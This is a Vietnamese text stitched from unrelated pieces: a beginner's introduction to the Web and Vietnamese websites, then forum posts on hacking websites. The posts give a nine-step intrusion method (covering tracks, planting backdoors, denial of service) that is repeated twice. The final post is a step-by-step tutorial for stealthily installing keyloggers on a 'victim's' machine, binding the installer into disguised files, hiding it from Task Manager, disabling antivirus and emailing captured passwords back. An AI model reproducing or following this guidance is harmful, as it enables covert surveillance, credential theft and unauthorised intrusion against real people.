chữ www thì sẽ trở thành www.ibm.com. Thành ra người sử dụng có thể đoán được địa chỉ URL của
hãng IBM sẽ là:

http://www.ibm.com

Một thí dụ khác như trường đại học UC Davis tại California có tên vùng của địa chỉ điện thư là
ucdavis.edu. Với cách thức trên thì địa chỉ URL của trường đại học UC Davis sẽ là:

http://www.ucdavis.edu
Cách trình bày của những trang tài liệu

Tài liệu tại mỗi máy phục vụ Mạng Nhện được trìnhbày bằng nhiều trang tài liệu. Trang đầu tiên
được gọi là Trang Gốc (Home page) là trang tài liều được trình bày đầu tiên trên mọi máy phục vụ
Mạng Nhện. Hầu hết những hãng xưỡng, trường học, cơ quan, hội đoàn nào có móc nối vào Mạng
Lưới Thông Tin Toàn Cầu đều có một hoặc nhiều máy phục vụ Mạng Nhện. Những trang tài liệu này
(Web pages) được trình bày theo lối phương pháp HyperText Markup Language (HTML) được tạm
dịch là Phương Pháp Đánh Dấu Lộ Ngữ (PPĐDLN). PPĐDLN này cho phép người soạn những
trang tài liệu được xếp đặt hình ảnh, chữ viết, màu sắc và liên kết với những trang tài liệu khác ở nơi
đó hoặc ở một trang tài liệu nằm ở một máy phục vụ Mạng Nhện khác.

Thật ra người sử dụng nhu liệu Quan Sát Mạng Nhện không cần phải biết những vấn đề liên kết đó.
Người sử dụng chỉ thấy trang tài liệu được trình bày đẹp đẻ với những hình ảnh và tài liệu được trình
bày với nhiều kiểu chữ khác nhau để làm nổi bật chi tiết. Những phần hoặc những chữ quan trọng
được làm nổi bật bằng một màu khác thông thường là màu xanh. Những nơi đặc biệt này được liên
kết tới một trang tài liệu khác ở nơi đó hoặc tại một nơi khác để trình bày cho người sử dụng những
chi tiết mới. Như vậy chúng ta thấy rằng việc sử dụng nhu liệu Quan Sát Mạng Nhện rất là dễ dàng.
Người sử dụng chỉ cần đọc và chọn những phần những chữ liên quan đến những gì mình muốn biết
và nhu liệu Quan Sát Mạng Nhện sẽ dùng cách liên kết để mang những tài liệu từ những nơi xa xăm
trên thế giới đến cho người sử dụng mà người sử dụng không cần phải tìm kiếm. Vài thí dụ như bắt
đầu tại một máy phục vụ Mạng Nhện tại một nơi nào đó trên nước Mỹ, sự liên kết của những trang
tài liệu có thể dẫn người sử dụng tới những hình ảnh lịch sử, những tranh ảnh nổi tiếng tại Paris,
Pháp. Hoặc những trang tài liệu trình bày về thời tiết tại Hồng Công, luật lệ tại Tân Gia Ba, những
bài diễn văn nổi tiếng của lịch sử Hoa Kỳ, những dự luật đang bàn thảo tại Quốc Hội Hoa Kỳ v.v.
Tất cả những tài liệu đó điều được liên kết bởi Mạng Nhện Toàn Cầu.

Ngoài việc giúp người sử dụng tìm kiếm tài liệu dễ dàng, nhu liệu QSMN còn giúp người sử dụng
những việc cần thiết khác như để dành những tài liệu vào máy vi tính của người sử dụng, hoặc gửi
tài liệu đó tới bất cứ nơi nào bằng phương pháp Điện Thư (E-Mail), hoặc in tài liệu đó ra trên giấy.
Xin chú ý là vì khi sử dụng nhu liệu QSMN, có nhiều trang tài liệu có trang trí hình ảnh như vậy sẽ
tạo ra chậm chạp vì số lượng tín hiệu của hình ảnh rất nhiều. Nếu người sử dụng không nhất thiết
cần coi những hình ảnh thì họ có thể ra lệnh cho nhu liệu QSMN không lưu chuyển hình ảnh về máy
vi tính của họ và việc này sẽ giúp cho việc đọc tài liệu sẽ nhanh ***ng hơn nhiều.
Những trạm phục vụ Mạng Nhện cho người Việt

Trên Mạng Lưới Thông Tin Toàn Cầu số lượng người Việt trên thế giới tham gia rất đông đảo. Do đó
có nhiều hội đoàn hoặc nhóm chuyên gia đã thành lập ra những nơi lưu trử tài liệu trên Mạng Nhện
Toàn Cầu để phục vụ cộng đồng Việt Nam tại hãi ngoại. Sau đây là vài nơi đặc biệt:
• VietNet - http://www.vnet.org & http://www.vn.net
Đây là một trong những nơi đặc sắc nhất trong những trạm phục vụ Mạng Nhện cho người Việt trên
MNTC. — đây tài liệu được trình bày rõ ràng, hình ảnh đẹp, nội dung phong phú với nhiều đề tài
khác nhau truyện ngắn, thư viện kỹ thuật với những tài liệu kỹ thuật bằng tiếng Việt, tập thơ của thi
sĩ Trần Trung Đạo, Xuân Diệu, Đinh Hùng, Hàn Mặc Tử, Phạm Thiên Thu v.v., tuyển tập của hàng
trăm bài nhạc Việt Nam được ưa chuộng nhất, tủ sách điện tử, tử vi đông phương, những hình ảnh
đặc sắc của đất nước quê hương Việt Nam v.v.

Ngoài ra VietNet còn được liên kết với những trạm phục vụ Mạng Nhện của những đoàn thể, hội
đoàn khác trên thế giới. Điểm cần chú ý là VietNet còn có thêm phần cho phép người sử dụng đọc
được nhóm tin Việt Nam trên Nhóm Tin Toàn Cầu (USENET) hoặc những nhóm tin khác. VietNet
còn có nhiều tài liệu để giúp đở người sử dụng hiểu rỏ về những đề tài liên quan đến Mạng Lưới
Thông Tin Toàn Cầu.

Điểm đặc biệt là VietNet đã có sẵn những mối liên kết với nhiều trạm phục vụ Mạng Nhện hữu ích
khác trên Mạng Nhện Toàn Cầu giúp cho người sử dụng tìm tài liệu nhanh ***ng hơn.
• Nhóm chuyên gia TriChlor - http://www.trichlor.org
Đây là nơi mà người sử dụng sẽ hiểu rỏ nhiều hơn về nhóm chuyên gia TriChlor. Những chuyên gia
của nhóm này đã tạo ra nhiều nhu liệu rất ích lợi cho người Việt. Tại đây người sử dụng sẽ có dịp
xem xét nhiều nhu liệu hữu ích như nhu liệu viết tiếng Việt theo Nghi Thức VISCII là một trong
những dạng tiếng Việt thông dụng nhất, nhu liệu bắt lỗi chính tã cho tiếng Việt, nhu liệu tìm ngày
(Lịch), thơ văn, ca nhạc v.v. Những nhu liệu này đã được tạo thành để có thể chạy trên nhiều Hệ
Thống Điều Khiển (OS) khác nhau. Điều nên chú ý là hiện nay nhóm TriChlor đã và đang tạo ra
nhiều phong (font) để giúp người sử dụng nhu liệu Quan Sát Mạng Nhện có thể đọc được chữ Việt
ngay trên nhu liệu QSMN.

Hacker làm gì để hack 1 trang Web :

<1> Các bug , vulnerability ... đã được công bố trên toàn cầu nhưng chưa chắc site đã patch . Hãy
thử những bug mới nhất của công nghệ đang dùng của site đó .

<2> Admin không phải lúc nào cũng cẩn thận , đôi khi họ sai lầm . Và tôi đúc kết những điều sau :
<a> CHMOD : nhiều khi file config của forum không được CHMOD và dẫn đến dễ dàng xem được
nó . Thông thường đối với 1 số site bảo mật kém thì password của MYSQL thường trùng với pass
của FTP Account . Ta dễ dàng deface .
<b> TROJAN , KEYLOGGER : 1 công cụ khá đơn giản nhưng hiệu nghiệm , nếu admin sơ xuất
disable NAV thì thứ này sẽ giúp ta có những info đặc biệt quan trọng về máy chủ .
<c> Password default : Thứ dễ dàng này đôi khi rất hiệu nghiệm . Admin mới setup xong server . Và
sơ ý chưa change password default hoặc biết nhưng không đổi là điều kiện cho bạn attack hay deface
.

<3> ANON FTP : Bài này bác KHA hướng dẫn khá cụ thể . Tôi xin nói vấn tắt . 1 số server cho đăng
nhập FTP nặc danh . Tức là user " khách " . 1 số site cho phép user guest hay anon này upload hay
download . Hãy tận dụng .
Tôi đã điểm qua sơ lược 1 vài kinh nghiệm của tôi . Hy vọng các bạn sẽ áp dụng được trong thực tế
và sáng tạo những cách hay hơn ...

" Làm thế nào để tôi có thể dùng công cụ tìm kiếm để hack ?" điều này không khó, nó có thể giúp
cho bạn những lợi ích thật sự nhanh và dễ dàng. Chúng cho phép bạn tìm thấy những điều mà bạn
thực sự sẽ chưa bao giờ tìm thấy trước đó. Và với đặc điểm tìm kiếm mới của google, bạn có thể
thấy được những điều đã được đưa xuống. Tôi sẽ giải thích vài tình huống nơi tôi đã sử dụng công
cụ tìm kiếm để có thể đột nhập và xem những gì mà admin muốn giữ bí mật
Bây giờ một phần lớn của điều mà nghe có vẻ như tôi là scripts kiddie FPRIVATE 
"TYPE=PICT;ALT=smile.gif" và với kỹ thuật này nó có vẻ là khá hữu dụng. Không có gì là sai với
việc tìm con đường dễ bây giờ và về sau.
.................................................. .................................................. ...............
Cơ sở dữ liệu là những file chứa dữ liệu trong đó,và chúng thường là thông tin, cơ sở dữ liệu hay là
những gì ? (info.db,database.txt,list.txt)…. những cơ sở dữ liệu đó có thể chứa rất nhiều thứ khác
nhau và khi để cả thế giới biết thì chúng có thể bị khai thác.
chúng ta hãy nói về một công ty, họ bán giấy trên web sites của họ. Công ty đã sử dụng scripts từ
http://www.freescripts.com/
.................................................. .................................................. ...............
Bước đầu tiên :
Kiểm tra công ty và thấy rằng họ đang sử dụng scripts từ http://www.freescripts.com/ và đầu tiên
kiểm tra Net để biết khai thác scripts. Nhưng bạn có biết chúng bằt đầu từ đâu không ? Tìm kiếm tên
của một file trên google
"download submitform3.php3"
Nếu nó là một tên thông thường ta sẽ tìm được vài mẫu lệnh của scripts mà chứa ở trên tất cả các
scripts,ví dụ : "scripts coded by redranger" và tìm kiếm nó
Ok bây giờ bạn đã có tên trang web chứa scripts, tìm trong trang chủ của nó,tìm kiếm để biết khai
thác và bạn cảm thấy thế thật là mất thời gian của bạn, cố gắng lần này, download scripts ở trên trang
chủ của nó và nhìn toàn bộ để khai thác
.................................................. .................................................. ...............
Trong trang Web :
http://www.google.com/
Bạn hãy type "allinurl:php site" và Enter :
http://www.itvnonline.net/bai%20viet/www.google.com
nó sẽ tìm bat cu php scripts tren công ty trên.
Bạn cũng có thể tìm kiếm allinurl:cgi hoặc jsp hoặc bất cứ scripts nào bạn muốn tìm. Con đường tốt
nhất cho mục tiêu ngẫu nhiên là khai thác được scripts mới nhất từ bugtraq và allinurl:script.cgi……
… tôi không đề nghị như vậy, bởi vì như vậy thực sự là không hợp lý, một người nào đó có thể làm
vậy và bạn không có lý do gì để khai thác nhiều trong số trang đó……nhưng có thể bạn sẽ phải đi
ngang qua trang web củ kẻ địch
.
.................................................. .................................................. ..................................................
.................................................. .................................................. ..........................
Đó là sơ sơ về việc sử dụng công cụ tìmkiếm cho việc hack mà tôi đã tìm đươc !
Trong lần tới tôi sẽ giới thiệu tiếp !
Sau đây tôi xin giới thiệu các bước mà một hacker trải qua :
.................................................. .................................................. ....................
I-Bước 1:
FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ
bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois
, Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu
trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) ,
Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig ,
nslookup Is -d , Sam spade
.................................................. .................................................. ..........................
II-Bước 2:
Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận
dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng
là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping
ProPack , nmap , SuperScan , fscan nmap , queso , siphon .
.................................................. .................................................. ..........................
III-Bước 3:
Enumeration : Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên
server , mức độ bảo vệ ... Công nghệ bạn cần sử dụng là : List user accounts , List file share ,
Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin
showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo .
.................................................. .................................................. ..........................
IV-Bước 4:
Gaining access : Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục
tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack . Công nghệ : Password eavesdropping , File
Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack
readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL
.................................................. .................................................. ..........................
V-Bước 5:
Escalating privilege : Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên ,
chúng ta sẽ có cái tận dụng để điều khiển Server . Công nghệ : Password cracking , BUG ,Exploits .
Tools : john , L0phtcrack , Ic_messages , getadmin , sechole .
.................................................. .................................................. ..........................
VI-Bước 6:
Pilfering : Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này
không thành công , hãy đến bước <9> . Công nghệ : Evaluate trusts , Search for cleartext passwords .
Tool : rhost , LSA Secrets user data , configuration files , Registry .
.................................................. .................................................. ..........................
VII-Bước 7:
Covering Tracks : Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc ,
chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG . Công nghệ : Clear logs , hide
tools . Tools : Zap , Event log GUI , rootkits , file streaming .
.................................................. .................................................. ..........................
VIII-Bước 8:
Creating Backdoors : Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ .
Nếu không thành công , quay lại bước <4> xem lại các quyền của user bạn sử dụng . Công nghệ :
Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services ,
install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel ,
administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K ,
keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll
.................................................. .................................................. ..........................
IX-Bước 9:
Denial of Servies : 1 attacker không thành công với những gì anh ta đã làm ... họ sẽ tận dụng những
exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ . Công
nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset
bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land
, latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht

.................................................. .................................................. .................................................. ....


Bài viết này tôi đọc được trên mạng . Thấy hay nên post lên !
.................................................. .................................................. ..........................
Bạn có thể tìm các công cụ bằng cách Search bằng Google ...
.................................................. .................................................. ..........................
I-Bước 1:
FootPrinting : Các mục tiêu của bước này chủ yếu là những thông tin ban đầu về server . Công nghệ
bạn cần sử dụng là : Open source search ( nguồn máy chủ tìm kiếm ) Whois , Web interface to whois
, Arin Whois , DNS zone transfer ( bộ phận này chủ yếu là kiểm tra về người chủ server , DNS .. cấu
trúc server chưa thể hiện rõ ở đây ) 1 số công cụ : UseNet , search engines ( công cụ tìm kiếm ) ,
Edgar Any Unix client , http://www.networksolutions.com/whois , http://www.arin.net/whois , dig ,
nslookup Is -d , Sam spade
.................................................. .................................................. ..........................
II-Bước 2:
Scanning : Phần lớn các server chịu bung thông tin quan trọng trong bước này , hãy cố gắng tận
dụng bước này triệt để để biết các port trên server , nghe đường dữ liệu . Công nghệ bạn cần sử dụng
là : Ping Sweep , TCP/UDP port Scan , Os Detection . Các công cụ : fping , icmpenum Ws_ping
ProPack , nmap , SuperScan , fscan nmap , queso , siphon .
.................................................. .................................................. ..........................
III-Bước 3:
Enumeration : Đến bước này , các attacker bắt đầu kiểm soát server sơ bộ , xác định các account trên
server , mức độ bảo vệ ... Công nghệ bạn cần sử dụng là : List user accounts , List file share ,
Identify applications . Các tool phụ trợ : null sessions , DumpACL , sid2user , OnSite Admin
showmount , NAT , Legion banner grabbing với telnet , netcat , rpcinfo .
.................................................. .................................................. ..........................
IV-Bước 4:
Gaining access : Aha , đã có đủ dữ liệu để kết hợp tất cả chúng lại . Chúng ta bắt đầu đến gần mục
tiêu . Hãy nắm chắc cơ hội . 1 account có thể bị Crack . Công nghệ : Password eavesdropping , File
Share brute forcing , Password file grab , buffer overflows . Các tool : tcpdump , L0phtcrack
readsmb , NAT , legion , tftp , pwdump2 ( NT ) ttdb , bind , IIS , .HTR/ISM.DLL
.................................................. .................................................. ..........................
V-Bước 5:
Escalating privilege : Nếu 1 account không may mắn nào ở một cấp độ nào đó bị crack ở bước trên ,
chúng ta sẽ có cái tận dụng để điều khiển Server . Công nghệ : Password cracking , BUG ,Exploits .
Tools : john , L0phtcrack , Ic_messages , getadmin , sechole .
.................................................. .................................................. ..........................
VI-Bước 6:
Pilfering : Thông tin lấy từ bước trên đủ để ta định vị server và điều khiển server . Nếu bước này
không thành công , hãy đến bước <9> . Công nghệ : Evaluate trusts , Search for cleartext passwords .
Tool : rhost , LSA Secrets user data , configuration files , Registry .
.................................................. .................................................. ..........................
VII-Bước 7:
Covering Tracks : Hệ thộng luôn ghi nhận những hành động của bạn . Nếu bây giờ mà kết thúc ,
chắc bạn bị tóm ngay . Đây là bước cực kì quan trọng . XÓA LOG . Công nghệ : Clear logs , hide
tools . Tools : Zap , Event log GUI , rootkits , file streaming .
.................................................. .................................................. ..........................
VIII-Bước 8:
Creating Backdoors : Còn phải hỏi , bạn phải để lại 1 cái cổng sau , lần sau có vào thì dễ hơn chứ .
Nếu không thành công , quay lại bước <4> xem lại các quyền của user bạn sử dụng . Công nghệ :
Creat rogue user accounts , schedule batch jobs , infect startup files , plant remote control services ,
install monitoring mechanisms , replace apps with Trojan . Tools : members of wheel ,
administrators cron, At rc , Startup folder , registry keys , netcat , remote.exe , VNC , BO2K ,
keystroke loggers, add acct to secadmin mail aliases login , fpnwclnt.dll
.................................................. .................................................. ..........................
IX-Bước 9:
Denial of Servies : 1 attacker không thành công với những gì anh ta đã làm ... họ sẽ tận dụng những
exploits code để làm cho server ngừng hoạt động luôn , gọi đó là : tấn công từ chối dịch vụ . Công
nghệ : SYN flood , ICMP techniques , Identical src/dst SYN requests , Overlapping fragment/offset
bugs , Out of bounds TCP options ( OOB ) DDoS . Tools phụ trợ : synk4 , ping of death , smurf land
, latierra , teardrop , bonk , newtear , supernuke.exe , trinoo/TFN/stacheldraht

.................................................. .................................................. .................................................. ....


Bài viết này tôi đọc được trên mạng . Thấy hay nên post lên !
.................................................. .................................................. ..........................
Bạn có thể tìm các công cụ bằng cách Search bằng Google ...
.................................................. .................................................. ..........................

Bài viết đã được chỉnh sửa nội dung bởi troidat vào lúc Dec 16 2004, 03:58 PM
maco111
09-19-2006, 10:36 AM
sưu tầm

THẾ GIỚI KEYLOG RẤT ĐA DẠNG, NHƯNG DƯỚI ĐÂY LÀ MỘT TRONG NHỮNG CON
KEYLOG XẾP VÀO LOẠI NGUY HIỂM BẬC NHẤT ĐƯỢC NHIỀU CÁC HACKER SỬ DỤNG
NHẤT HIỆN NAY

1)_ Perfect Keylogger V 1.62 con này cool đúng như tên gọi của nó, ngoài ra còn có khả năng ghi
bàn phím ảo theo kiểu chụp click chuột chức năng tốt, dùng rất tốt ghi tấn tập chung tấn công 1 mục
tiêu xác định, nhưng phân tích đựoc một cái pass click bằng chuột thì hơi oải.(ko qua được tường
lửa)

2)_ SC-Keylogger Pro V3.2 về chức năng thì con này tuyệnt nhất, log cũng dễ đọc nhưng mỗi tội
hay lỗi khi cài đặt, tỉ lệ thành công là 40% (tùy theo cấu hình của máy v vv......) (ko qua được tường
lửa)

3)_ Backlogger 2.0

4)_ 007 Spy Software con này ghi tốt, gửi mail rất ổn định nhưng log của nó hơi khó đọc, ẩn tốt, có
khả năng remote intalls nhưng mình chưa thử bao giờ

5)_Ardamax 2.42 con này cũng ghi bàn phím ảo rất tốt, log dễ phân tích, ẩn rất tốt, có khả năng gỡ
bỏ anti khi đã cài đặt thành công

6)_Win-spy 8.8 pro còn này cũng very cool, ẩn tốt, gỡ bỏ anti và vô hiệu hóa tường lửa(rất cool)

BẮT TAY VÀO VẤN ĐỀ CHÍNH NÀOOOOO....!!!!!!!

1) PERFECT KEYLOGER V1.62

Trong các loại Keylogger thì PERFECT KEYLOGGER 1.62 là loại thông dụng nhất . Phương pháp
cài đặt của nó có phần phức tạp ; nhưng bạn nào đã cài đặt thành công nó thì hầu như các loại p/m
keylogger khác đều tương tự và cài đặt dễ dàng .

Giới thiệu với các bạn Percfect Keylogger V1.62 là 1 trong 10 con keyloger nguy hiểm nhất ;( Xếp
hạng thứ tư là Perfect Keylogger – "gián điệp" này có khả năng ghi lại các ký tự nhập từ bàn phím,
các mật khẩu, số thẻ tín dụng.) Các file log của nó gửi về Email cho chủ nhân rất dễ phân tích và
truy cứu số liệu . Nếu download được phiên bản mới nhất và cài đặt đúng phương pháp thì nó có thể
lấy được pass của các cách sử dụng qua “bàn phìm ảo”.
Đặc điểm của Perfect Keylogger 1.62 là nó tạo ra được file Remote Install với dung lượng nhỏ
(khoảng 200kb) Chúng ta có thể cho file này ẩn nấp (nhúng vào , *****g ghép ) dưới rất nhiều dạng
File để dụ Victim vào bẩy.(exe ; Image ; Mp3 ; Steath Icon ) .Cách dùng Perfect Keylogger này rất
hiệu quả và thông dụng . Tuy nhiên vì tính chất " nguy hiểm và bén nhạy" của nó mà hiện nay nó bị
hầu hết các loại AntiVirus có tiếng tăm loại trừ hẳn . tuy nhiên với các bác chơi keylog nhà ta bây
giờ mà muốn setup ngoài quán nét thì kiểu gì cũng phải phá bỏ cái deepfreezer. thế nên theo mình
con này dùng là tuyệt vời nhất. Cách cài đặt và sử dụng sẽ được giới thiệu sau đây :

sau khi run file exe ta sẽ thấy một màn hình sau
đâyhttp://www.freewebs.com/hands_at/images/PerfectKeylogger.jpg
Chọn next để tiếp tục
Sau đó là màn hình
http://www.freewebs.com/hands_at/images/PerfectKeylogger1.jpg
Chọn Yes nhấn Next để tiếp tục :
http://www.freewebs.com/hands_at/images/PerfectKeylogger2.jpg
Keyword : Cac ban chon mot cai ten sao cho Victim khi tim ra phai lung tung lua chon de DEL ; thi
du : YahooWXC hay WinLogon hay NortonFind ; hay OfficeXP v.v… ; noi chung la tuy y .
http://www.freewebs.com/hands_at/images/PerfectKeylogger3.jpg
Cac ban change dia chi de setup vao (rat quan trong de an ***) theo toi chon :
C:\Program Files\Yahoo!\Messenger hay :
C:\WINDOWS\system hay
C:\Program Files\Common Files\Microsoft Shared\DAO
Nhung dia chi nay Victim rat kho phat hien .
Ở bước này bạn chọn check box số 2 là : Stealth Installation .(để không có bảng báo cáo trong "add
remove program"
Phần còn lại bam next tiếp tục .
Cac thao tac ke tiep de setup cac ban biet roi , cuoi cung la dien Usename vas pass cua chuong trinh
vao bang Registration

Sau đây là cách để bạn thao tác với control panel :

Bạn chú ý hình này ở phía cuối góc phải màn hình
http://www.freewebs.com/hands_at/images/PerfectKeylogger4.jpg
Click chuột phải chọn Options.
vào màn hình đâu tiên Seting lại các dữ liệu như:
http://www.freewebs.com/hands_at/images/PerfectKeylogger5.jpg
Sho/hide program Icon : Chon phim tat de goi chuong trinh ra
Ví dụ : Ctrl + Alt + L .hoặc v..v…(Bạn phải nhớ phím tắt này nếu không thì không gọi nó ra được để
tạo file Remote Install)
Chọn check box Run on windows startup để pbk khởi động khi win chạy
Chọn check box Don't show program icon at startup để ẩn cái icon của chưong trình trong danh muc
những chương trình khởi động
Show / hide program icon :Chọn phím tắt để làm ẩn hay hiện ra chương trình ,cái icon ở khay icon
sẽ hiện ra hay ẩn đi khi nhấn tổ hợp phím, Bạn nên đặt một phím tắt bí mật của riêng bạn.
Hide program from Ctrl+Alt+Del :Bạn hãy đánh dấu vào ô này để ẩn tên chương trình hiện ra trong
Task Manager (nên chọn)
mấy cái còn lại bạn chọn cũng được, kô cũng đựoc

Tiếp tục :
http://www.freewebs.com/hands_at/images/PerfectKeylogger6.jpg
Set Password : dien pass de mo chuong trinh
Khong chon : Monitor only……….
Chọn hết tất cả các check box tại log này
http://www.freewebs.com/hands_at/images/PerfectKeylogger9.jpg
Khong nen chon Capture man hinh (Bo tat ca cac dau kiem)
File hình ảnh chỉ làm Mail gửi về có dung lượng cao . Nhưng đối với các bàn phím ảo thì nó rất hiệu
quả khi ta chỉ cần đánh Victim trong vài ngày là rút lui bí mật .
http://www.freewebs.com/hands_at/images/PerfectKeylogger7.jpg
chọn thời gian mỗi lần keylog ghi nhận rồi send back lại cho bạn log : ví dụ mình chọn send về 1
mail sau mỗi 30 phut
Chon send log only ………… thi du : 100 kb .
Nhấn qua Deliever để điền mail .
bạn điền email bạn vào
http://www.freewebs.com/hands_at/images/PerfectKeylogger8.jpg
Đây là phần cài đặt các thông số để con Keylogger tự động gửi Email về cho chủ nhân nó . Rất nhiều
bạn đã lúng túng không biết lấy các thông số này từ đâu và thường bị thất bại tại bước này . Các bạn
chú ý từng thao tác nhé :
Tại bảng này bấm vào "Email" bên trái bảng >
http://www.freewebs.com/hands_at/images/PerfectKeylogger6.jpg
bấm vào Delivery Bảng mới này hiện ra >
http://www.freewebs.com/hands_at/images/1s.png
Send to : Điền địa chỉ Email bạn muốn nó gửi về
http://www.freewebs.com/hands_at/images/2s.png
Username và password :điền của địa chỉ email đã điiền trên .(Nên dùng Mail gửi và nhận cùng 1 địa
chỉ )
http://www.freewebs.com/hands_at/images/4s.png
SMTP : phần này rất quan trọng (rất nhiều người thắc mắc)
http://www.freewebs.com/hands_at/images/3.png
ở đây tôi nêu cho các bạn gmail (Nên chọn GMAIL để gửi và nhận thư ) và tuyệt đối ko chọn
yahoomail hay hostmail (ko hỗ trợ 2 loại này)
GMAIL :
gsmtp183.google.com
gsmtp163.google.com
gmail-smtp-l.google.com
alt2.gmail-smtp-in.l.google.com
alt1.gmail-smtp-in.l.google.com
=>=> bọn gmail này đảm bảo dùng rất cool , Ít khi bị kẹt Mail trên Server .
Chọn một trong những địa chỉ SMTP này để đièn vào ô tương xứng . Điều quan trọng ở đây là
Gmail chỉ gửi cho Gmail và yahoo mail chỉ gửi được cho yahoo mail.
Authentication : chọn NON
Bấm vào Send test để thử .Nếu thành công các bạn sẽ được thông báo như sau :

http://www.freewebs.com/hands_at/images/5.png
Về việc chọn option trên FTP thì mình chưa dùng bao giờ, theo mình nên gửi log theo mail là cool
nhất(tránh trường hợp host die)
Tiếp theo : Tạo file Remote Install
TẠO FILE REMOTE INSTALL
(Chỉ trong vòng 10 giây con Keylogger đã được setup vào máy hoặc Victim chỉ cần kích vào là ta đã
thành công)
Tại phía dưới bên phải màn hình > kích phải vào biểu tượng hình cuộn phim > chọn Remote
Installation
http://www.freewebs.com/hands_at/images/PerfectKeylogger4.jpg
http://www.freewebs.com/hands_at/images/6.png
Bấm NEXT để tiếp tục :(chọn đúng như trong ảnh)
http://www.freewebs.com/hands_at/images/7.png
Bấm NEXT để tiếp tục :
http://www.freewebs.com/hands_at/images/8s.png
Bấm vào : BROWSE để chỉ file dẫn cho con keylogger nhúng vào . Có thể chọn file EXE hay file
nhạc v.v..
Bấm NEXT > NEXT > Finish .
File mới được tạo ra có tên đầu là : inst+tên gốc của file dẫn , Ta có thể đổi tên file này lại tùy ý .
http://www.freewebs.com/hands_at/images/9.png
Dùng file này để gửi đến Victim hay mang ra hàng NET kíck đôi vào nó là ta đã cài đặt xong vào
máy Victim >> Khi cài đặt thành công trong Email của các bạn se có 1 mail gửi đến báo thành công
như sau :
http://www.freewebs.com/hands_at/images/SNAG-suc.jpg
CHỈ CẦN SEND FILE REMOTE CHO VICTIM VÀ LỪA VICTIM CLICK CHUỘT VÀO FILE
ĐÓ LÀ MỘT CON VIRUS Y SÌ ĐÚC VỚI CON VIRUS BẠN ĐÃ THỬ CÀI Ở NHÀ ĐỰOC CÀI
VÀO MÁY NẠN NHÂN. HOẶC ĐEM RA HÀNG NÉT TÙY BẠN

KHI CÀI ĐẶT VÀO MÁY VICTIM ĐÔI KHI KO THẤY FILE LOG GỬI VỀ ĐÔI KHI CÓ RẤT
NHIỀU LI DO, NHƯNG NGUYÊN NHÂN CHÍNH ĐƯỢC TÔI LIỆT KÊ DƯỚI ĐÂY:
1---ĐƯỜNG DẪN CÀI ĐẶT KEYLOG VÀO MÁY VICTIM KO GIỐNG VỚI ĐƯỜNG DẪN
MÌNH SETUP Ở NHÀ
2---MÁY VICTIM ĐỂ TƯỜNG LỬA
3---CÁC BẠN TỰ MÀY MÒ

VÀ NHỚ MỘT ĐIỀU RẰNG NẾU CÓ ĐEM CÁI CON REMOTED RA QUÁN NÉT THÌ NHỚ
PHẢI DISABLE ANTIVIRUS ĐI ĐÃ NHÉ, SAU ĐÓ OFF LUÔN CÁI FIREWALL, CUỐI CÙNG
BẠN PHÁ DEEP.
CHÚC CÁC BẠN LÀM ĂN NGON LÀNH,
SC-KEYlOGER PRO V3.2 (
LINKDOWLOAD .........(CÁI NÀY TỰ KIẾM NHÉ) AI LẤY BẢN CÓ SERIAL LÊN TIẾNG TÔI
SHARE CHO

SETUP:

Kích đôi vào biểu tượng p/m , giao diện cài đặt đầu tiên quen thuộc

http://www.freewebs.com/hands_at/images/007/Setup007.jpg

Bạn bấm vào "Next" > chọn vào " I acept.."

http://www.freewebs.com/hands_at/images/007/Setup0071.jpg

Bấm "Next"

http://www.freewebs.com/hands_at/images/007/Setup0072.jpg

Bạn hãy chọn vào " Don't create any icon " P/m này sẽ không hiển thị tại các vị trí mà nó đã liệt kê
trong bảng , diều này là cho Victim lúng túng khi truy tìm để diệt , rất có lợi cho chủ nhân con
Keylogger . Bấm "Next" để tiếp tục .
Các bảng nhắc nhở quan trọng không nên bỏ qua :

http://www.freewebs.com/hands_at/images/007/Setup0073.jpg

http://www.freewebs.com/hands_at/images/007/Setup0074.jpg

Bấm vào "Install" để tiến hành cài đặt > Khi cài xong giao diện chính sẽ như sau :

http://www.freewebs.com/hands_at/images/007/Setup0075.jpg

Bạn hãy bấm vào " Register now" để diền user name và Key

http://www.freewebs.com/hands_at/images/007/Setup0076.jpg

Nếu thành công thì bạn sẽ có được thông báo như thế này :

http://www.freewebs.com/hands_at/images/007/Setup0077.jpg
Tiep theo >>>>>

"Tiếp theo"
Chọn paswword và phím nóng (lưu ý chọn khác với mặc định của nó) Ở phần password setup chúng
